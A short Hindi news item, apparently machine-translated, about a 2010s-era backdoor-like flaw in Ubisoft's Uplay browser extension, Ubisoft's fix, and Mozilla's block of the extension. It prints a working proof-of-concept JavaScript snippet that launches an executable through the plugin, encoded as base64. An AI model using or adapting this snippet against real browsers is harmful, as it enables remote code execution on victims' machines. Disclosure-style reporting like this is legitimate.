यूबीसॉफ्ट के यूप्ले कार्यक्रम में कल एक
गंभीर भेद्यता की खोज की गई थी, जो कि उन लाखों उपयोगकर्ताओं के कंप्यूटर पर एक बैकडोर है, जो यूबीसॉफ्ट से लाइसेंस वाले गेम इंस्टॉल करते हैं, जैसे कि हत्यारे की नस्ल, बियोवुल्फ़, हीरोज़ ऑफ़ माइट और मैजिक VI, टॉम क्लेन्सी की स्प्लिंटर सेल और अन्य। गेम के साथ, उनके कंप्यूटर पर Uplay DRM सिस्टम और एक ब्राउज़र एक्सटेंशन स्थापित किया गया था।
इसलिए, इस एक्सटेंशन के माध्यम से एक विशेष कोड का उपयोग करके, आप
किसी भी साइट से उपयोगकर्ता के सिस्टम
तक पहुंच सकते हैं।
डेमो (एक उदाहरण के रूप में, यह आपके कंप्यूटर पर कैलकुलेटर प्रोग्राम शुरू करता है) ।
कोड:
var x = document.createElement('OBJECT'); x.setAttribute("type", "application/x-uplaypc"); document.body.appendChild(x); x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
यूबीसॉफ्ट ने आश्वासन दिया कि पिछले दरवाजे को विशेष रूप से सिस्टम में नहीं बनाया गया था, और यह कोड में केवल एक गलती है। उन्होंने पहले ही यूप्ले का एक अद्यतन संस्करण
जारी किया है , जिसे आधिकारिक वेबसाइट से डाउनलोड किया जा सकता है।
लेकिन कार्यक्रम स्वचालित रूप से अपडेट नहीं होता है और यह लाखों कंप्यूटरों पर स्थापित होता है, कई लोगों के लिए, सुरक्षा जोखिम बना रहता है। इसलिए, मोज़िला ने आज सभी उपयोगकर्ताओं के लिए
यूप्ले एक्सटेंशन को
पूरी तरह से ब्लॉक करने का फैसला किया।